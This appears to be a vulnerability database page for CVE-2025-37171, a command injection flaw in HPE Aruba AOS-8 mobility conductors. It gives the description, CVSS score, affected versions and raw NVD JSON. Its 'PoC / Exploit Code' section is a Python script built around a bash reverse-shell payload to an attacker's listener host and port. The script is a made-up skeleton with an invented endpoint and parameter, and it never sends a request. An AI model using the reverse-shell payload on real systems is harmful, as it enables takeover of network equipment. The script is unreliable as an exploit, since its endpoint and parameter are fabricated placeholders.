Security Vulnerability Report
中文
CVE-2025-37171 CVSS 7.2 HIGH

CVE-2025-37171

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:45:38

Description

Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
HPE Aruba Mobility Conductors (AOS-8) - All versions prior to patches
Specific affected versions need to be confirmed via HPE Security Bulletin

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37171 PoC - HPE Aruba AOS-8 Command Injection # Authentication required with high privileges import requests import argparse def exploit_aruba_cve_2025_37171(target_url, username, password, lhost, lport): """ Exploit for CVE-2025-37171: Authenticated command injection in HPE Aruba AOS-8 Note: This is a demonstration code for authorized security testing only. """ login_url = f"{target_url}/v1/login" cmd_injection_url = f"{target_url}/v1/api/command_injection" # Login with high-privilege account session = requests.Session() login_data = { 'username': username, 'password': password } # Note: Actual exploitation requires identifying the vulnerable endpoint # and parameter. Below is a generic reverse shell payload structure. reverse_shell_payload = f""" bash -i >& /dev/tcp/{lhost}/{lport} 0>&1 """ # Encoded payload for command injection # The actual vulnerable parameter needs to be identified through testing exploit_data = { 'vulnerable_param': reverse_shell_payload, 'action': 'execute' } print(f"[*] Target: {target_url}") print(f"[*] Attempting authentication...") # This is a structural example only # Actual exploitation requires proper authentication and endpoint identification return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-37171 PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-u', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') parser.add_argument('-lh', '--lhost', required=True, help='Listener Host') parser.add_argument('-lp', '--lport', required=True, help='Listener Port') args = parser.parse_args() exploit_aruba_cve_2025_37171(args.target, args.username, args.password, args.lhost, args.lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37171", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.090", "lastModified": "2026-01-23T16:45:38.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authenticated command injection vulnerabilities exist in the web-based management interface of mobility conductors running AOS-8 operating system. Successful exploitation could allow an authenticated malicious actor to execute arbitrary commands as a privileged user on the underlying operating system."}, {"lang": "es", "value": "Vulnerabilidades de inyección de comandos autenticadas existen en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan el sistema operativo AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado ejecutar comandos arbitrarios como un usuario privilegiado en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "28EE6221-D715-48C4-B181-BD530080E706"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}